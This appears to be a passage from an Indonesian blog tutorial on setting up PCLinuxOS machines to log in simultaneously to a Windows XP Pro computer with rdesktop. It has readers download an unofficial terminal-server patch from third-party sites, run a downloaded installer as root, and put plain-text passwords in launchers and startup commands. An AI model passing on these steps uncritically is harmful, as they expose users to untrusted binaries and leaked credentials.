PCLinuxOS2 IP 192.168.0.2 / subnet 2
55.255.255.0

Catatan: Penomeran IP ini bebas terserah anda.

Cek apakah kedua komputer PCLinuxOS telah dapat berkomunikasi dengan komputer XP dengan cara

Pada komputer PCLinuxOS1 klik Menu – System Tools – Terminal kemudian ketik:

ping 192.168.0.3 (enter)

Jika ada replay berarti komputer PCLinuxOS tersebut sudah mampu berkomunikasi dengan komputer windows XP. Pada komputer PCLinuxOS2 lakukan hal yang sama.

1. Persiapan Pada Komputer Windows XP Pro (SP2)

- Download patch di:

http://blogpmenier.dynalias.net/docext/xp/Termiserv_XPSP2_i386_1.0.exe
atau

http://sala.pri.ee/terminal-server-patch/
atau

Termiserv_XPSP2_i386_1.0.zip

- Install patch tersebut dalam safe mode, caranya adalah sbb: Nyalakan komputer windows XP, sewaktu akan booting tekan tombol F8 secara terus menerus, kemudian pilihlah Safe Mode. lalu install patch tersebut. Patch ini berguna untuk membolehkan beberapa user login dalam satu komputer XP secara bersamaan.

- Buatlah beberapa user sebanyak komputer Pinux yang ada dalam jaringan dengan type limited user. Maksud dari limited user ini adalah masing-masing user mempunyai setting/profil dan folder document sendiri-sendiri tidak bercampur sehingga tidak akan saling mengganggu.

Start – Control Panel – User Account

Lalu buatlah 2 user sbb:

login: user01
Password: pass0
1

dan

login: user02
Password: pass02

Catatan: Nama login ini bebas terserah anda.

- Jalankan Fast User Switching: Control Panel – User Account – Change the way users log on or off pilih: Fast User Switching.

- Klik kanan pada icon My Computer di desktop pilih Properties kemudian pilih tab Remote
Centanglah ‘Allow users to connect remotely to this computer’ seperti tampak pada gambar berikut:

Kemudian klik ‘Select Remote Users’ dan isikan userid user-user yang telah anda buat sebelumnya:

Pada contoh diatas ada 50 user PCLinuxOS pada satu windows xp pro (menggunakan userid xp01 s/d xp50).

Sampai dengan di sini komputer XP-pro anda sudah siap digunakan untuk login secara simultan beberapa user sekaligus.

2. Perintah Pada Komputer PCLinuxOS
Jika seting pada komputer windows XP telah sia
p, maka yang perlu dilakukan pada komputer PCLinuxOS adalah sbb:
- Klik Menu - System Tools - Terminal
- Misal jika akan login ke komputer windows XP yang pada contoh ber-IP 192.168.0.3 dengan menggunakan user pada windows XP dengan login ‘user01′ dan password ‘pass01′ maka ketik sbb:

rdesktop -a 16 -u user01 -p pass01 192.168.0.3 &

Untuk secara fullscreen:

rdesktop -f -a 16 -u user01 -p pass01 192.168.0.3 &

Jika anda mengalami kesulitan dalam mengetikan perintah tersedia tools yang relatif lebih mudah untuk digunakan, yaitu klik: Menu - System Tools - Desktop Connection, kemudikan isikan IP komputer windows XP (pada contoh diatas 192.168.0.3) lalu klik tombol Execute.

Membuat Shortcut untuk Login ke XP

Anda dapat menambahkan suatu shortcut di desktop PCLinuxOS anda sehingga user PCLinuxOS tinggal mengklik shortcut jika akan login ke windows. Caranya adalah sbb:

Klik kanan pada desktop PCLinuxOS – pilih New Launcher isikan sbb:

Name: Windows XP
Generik Name: Windows XP
Comment: Login to windows XP
Command: rdesktop -f -a 16 -u user01 -p pass01 192.168.0.3 &
Type: Application

Icon: Pilih icon sesuai selera anda
Run in terminal tidak perlu di centang
Lalu tekan tombol OK

Jika kesulitan anda bisa mendownload shortcut dibawah ini:

menuxp.tar.gz

Keistimewan shortcut ini adalah: Sound pada XP bisa terdengar di
PCLinuxOS.
Shortcut ini untuk memudahkan login ke XP. Jadi tidak perlu
untuk mengetik perintah panjang seperti di
atas setiap kali akan login.
Shortcut ini mempunyai icon tampak seperti pada gambar di bawah.

Cara install shortcut:

- Login sebagai root
- Copykan file menuxp.tar.gz ke /root
- Buka terminal: Start - System Tools - Terminal
- Ketik:

tar -zxvf menuxp.tar.gz
cd menuxp
chmod a+x install
./install

- Setelah proses install selesai, isikan data IP komputer XP, username/password
yang telah dicreate di XP pada file /usr/bin/windoz dengan mengetik:

pico -w /usr/bin/windoz

untuk menyimpan file tekan CTRL-X lalu jawab Y lalu ENTER.

Membuat PCLinuxOS Otomatis Login pada windows XP

Selain dengan shortcut, anda juga dapat membuat komputer PCLinuxOS secara otomatis login ke komputer windows XP dengan cara:

- Pada komputer Pinux, klik Menu - Preferences - More Preferences – Sessions

- Klik tab ‘Startup Programs

- Klik tombol ‘add button’. Ketik perintah, contoh:

rdesktop -f -a 16 -u user01 -p pass01 192.168.0.3 &

- OK - Close.

Jangan lupa untuk melakukan penguncian ulang dengan perintah pinuxuserlock jika konfigurasi user yg anda modifikasi tersebut sebelum dalam keadaan terkunci (locked) sehingga seting ini akan tersimpan secara permanen oleh Pinux.

Berikut ini tampilan PClinuxOS kami, yg telah ditambahkan icon untuk login ke XP pro secara cepat:

Read more ...
Designed By Published.. Blogger Templates